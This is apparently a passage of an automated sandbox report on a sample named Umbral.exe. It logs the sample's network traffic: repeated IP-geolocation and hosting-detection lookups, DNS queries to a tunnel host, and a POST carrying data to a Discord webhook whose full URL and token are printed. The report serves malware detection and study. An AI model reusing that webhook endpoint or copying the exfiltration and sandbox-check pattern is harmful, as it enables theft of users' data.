                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: freegeoip.app
                            Source: global trafficDNS traffic detected: DNS query: ipbase.com
                            Source: global trafficDNS traffic detected: DNS query: stage-von.gl.at.ply.gg
                            Source: global trafficDNS traffic detected: DNS query: discord.com
                            Source: unknownHTTP traffic detected: POST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 941Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 30232Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VQZB0JK42WEQKAE0QYVXSCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGH9z3Oazcl8kTG3xkdmnqlu%2FbyjJ36%2FtKPgCmbObjnXq2fnPeaPaifCz41PpWbhSFxirjyVnXve7fqxFEiJryUsS7c7nVNxOkXHOMTevgpDRZmTmxt%2FR%2FGiid1P"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf2579bac7ac331-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missVary: Accept-EncodingX-Nf-Request-Id: 01J74VRFEC8WNH5W8D6W334D23CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mlu64iqkg565SokK38lt2HAqjAxdn0RvPpUwp8SPjOAQvO%2Fs1zq4Nf2JxX669auaw4j02nCq%2ByI3l0Ci8LKqs4Od9CT619XVkOWmGaymh1IZhyrc5I78bByczYx6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25802bb2872bc-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7649Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VRJ1JENJ0XXRKFJVTF69KCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYYLk7oTpOnWbR7VjQlNU77WC2L8I%2BuPk0ArvBDJLkWXGA%2FTGQzxBEJ0DeAfFbB%2FiArNtAK8h2f9sV1FwuJV9yqNTgORkx0F0%2BLJM6hq4RMNbQS1WLzjPdTWidIQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf258135cb678dc-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VRPARXH31AY7RMNNGA7Z5CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nMpa0QTm8d32T2M72n7KvO3daFQnDDi%2BBmJNi6OTMsHAfbYfl0EsAzMVZu9VcWmEaDQi1Z7Sl0hAu30UjMTWnHwm%2FqmfL8o50CuSLdT9DGu8a2neCbu2VSXVzeie"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf2582ecfb00f70-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7656Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VRS044ASAV2D4YKFE3GMXCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=83gyU9C9RjNCsGoT%2BwzJkgFws1PoPzAuBPGQw5tzy%2Bq7FTLWZbXGeZzBEY1JkKKbSo8wUxaH%2BQ4Y2LADqhtJ%2BiETdCpwqiXFl3W1wCvLKYUJA8Mz018dRNuEmkNc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf2583fec8443cd-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 27365Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VRZ2WT2RPQRVMFHJTMQQ6CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dLXYp%2BX4ehOAKvEKmx%2F%2F0uCXvVbooFbHg2xMXHphX1q%2F0LZoKviJ4zHwbOG3E727TJEjz9PamVNRyGFbmIN0B73dakgtcBKjZ1HeM1tnE9eirCFA91928EqqcbLf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25866d9ec7d1e-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 33316Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VS1RY8HR6ANAJX6PW7VKPCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzEtaSrIDsbh0oXNd4VoJFMlGK2mJzpKW33Ez1EWk9WO7yPMqgLjPmxY6bOXZrJpq%2BuKGosIO5eJgx0LPJImcJCPpSJ%2BTY3567%2B2Q2qLH7VNhZ6XKj50EEPiN7uZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf258780f5d43fd-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 24Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VS6K8GVVQKTRT2SHN0H3WCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KWzdHqkVWWmftKRCDeKCYrRN9%2BejA4SbAC2HUQ1wf4FcmdP%2BGtXvh1NLFVzbo%2FhxIeYxp87dUOxFnnQyq0OxoQ5V1QhsWYk6hPJPIk7lo5GxHF1lVml8GPTlnDK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25896e9e515d7-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7871Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VSAZWHJN4VQSRHZX4485HCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxyH9xG%2BA25CKhwaL6jxsH8eZ3JesWF05W8qIANunKM8WKIGFexREnq6SSDPm3XInYVIOqDxqdFOnyXfjK8BZ6Oy2YsIPKQdgN%2B2wYbrCZ7p%2BU8L9Afxk87J6Oqe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf258b30c3742bc-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 27380Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VSDK8VBW36FGQW2WATK2BCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6srdPrqol7Q3hUrVBUb8IH9mBB9V2pFA131CJRyn9XtL3hzB3YsmBpqvc%2Fe9y4JRI48QI8gXPICVdasgKiAcpDzKA5lrC9Gr2DcX7BDIcm24lVPcpXC1%2Bm5rMWPb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf258c3bce48ce0-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:47:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 19232Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VSJ4EH95V1KZHVGFJD469CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VOHCsR%2BB38YszEFOwXKdKvNSIpf9pLAaZf%2Fw3J0Sjt0k26ka2yw90BHa98GJ53GJMgv5RzZ%2FcV0O6t4XAQAohSXBUPJfgpVIKyhlqJzsCEzkWHQRLi4C2Yc9Hl6d"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf258e0bfb1728f-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 33336Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VSN292RR6E3MCGB9XJK82CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBalkW3sLCGdXhjrVjpACd19ua2xcO8H6KmdVgtGWbhHsEZcCjfWJErr0E5e9Q0rLuDwqtKDl%2FRHIfj%2FlefNQJwfVI9UroLwR4enS%2FrxK8mQOVNF7fMNo3sUYPbe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf258f379a642b2-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7886Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VSRXBWXJT3NXKWXWETCGCCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tnBG7ySWoKU5GgryGcI9O5ue3PzHWTyiJl42fjXbDJZ6jp3HabKVOrJCQwoyxUfyBIW%2B0L0lDH%2FRzcI8K3uqj9cZx4z16dRlFtPp89%2FVsGmI8yLu7HB561bIOQnG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf2590c2836c413-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 11911Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VSV5E5313SEQY6ZHG5CHQCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRywUc7YIJj0qebfyDtc1z4K64ggV97l%2F6b9tGTss9%2BKuV70cSFcwrig9wQVLcKaHkQIhLBBISYkahvocNEUlgD2q7PzVCiq%2F5%2F0UvPrbK3lk%2BWzNKZpBaE%2BA1GZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf2591a8c151821-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7890Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VSXG372MEWM1YJJZN85FSCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQMb07U8WhNxKBjU7pXvTXrpWf6fTE4ZD2Bkbc3Shn1nz6bKoaaS5TN6ymyC88M7f9tjPtqNl%2FC5ExApgZuCqwjcAHsgaS0xEmlkl8f0fj1Fa6vWO4NT3bJeFnfr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf259297c0d19f7-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 33348Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VT0TNF2W8XG0BFFKKC1XBCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Pg6W3xpD1HJndM4VsTcZEpzDL9ypKDVZEgJ2cKwBlMBnSJ8rfJIDVcApTIO%2F4clyt%2BiW7zYRZlRhgG3yE3Ik%2FTTzI2IMpsV5ghDisL4DGHQURMqsxUDef1FrQbL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf2593ec95f4301-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 27404Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VT4GSC4KK8FNFRDGCWCFTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1LndiuMAfg28CNUhb78%2FLVoNVrztt86poIq9qbf%2BwQgSNHuA8oetBx7tiwR%2B6jLGQW2i%2BLBO2P4RG%2B4YBP5N9OAza%2BtFJx1A2OhK9uY3tXOlfmJ9O6%2B5GC0NBO%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf259568a4878e7-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 33356Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VT8M6SNEAJGP7KF9K2AGKCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIPDCnXRrF5UFYEaGGNMeOByMnPUGRJCdYS4HiijT3L622POJbuVmZLmXzO0NlQKoaCDDoJqtUqy4QulAu795%2FeCDXtuGMSoFjqZepUKUk0raaDDlDHP0WAVRQL0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25970b8e4c33e-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 7904Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VTB36ZXH120ESFFBFTB5WCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hcae5LDQ5w%2Fq4ZwXH%2FdwgweebvJCgR5s8oK3moC98jUHkBVCRioGWGyMaroWfZo5qiv785f77Th2dZKqQYQ2FC6W8JotWHzkvBm4xyYC01loswjVknvA8DOlWSN8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf2598089b2434a-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 33361Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VTDTQVG8PGMEA6ESZANNECF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hK1%2FaoW8Wrlo0mYPgZleMLtCRkVOnOS%2FHNHblxiAm8BGVuGbyCA8ZqGJSl8PGfG%2F9v84Y%2Fm%2FOCqfHMkiKHGptBdJv89JYZS442%2FNgCMIEv6N4YmNsiUANWZdn3Ia"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf25991fd301a28-EWRalt-svc: h3=":443"; ma=86400
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 23:48:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 24609Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01J74VTXSS9YVPBA5969AWDEP4CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVtb8WVsQLRL5UId89DYORYd1bzEEY4PHWrs7JVYy0Wd9wwFeF9TYIzPKNkLXKR3zQXjeMvlO%2F9x0QV5dEexugQpwbpw9zYAEPVw5Yvzy%2FI0VN9bwZN2L8yE0%2F%2FR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bf259f83e244388-EWRalt-svc: h3=":443"; ma=86400
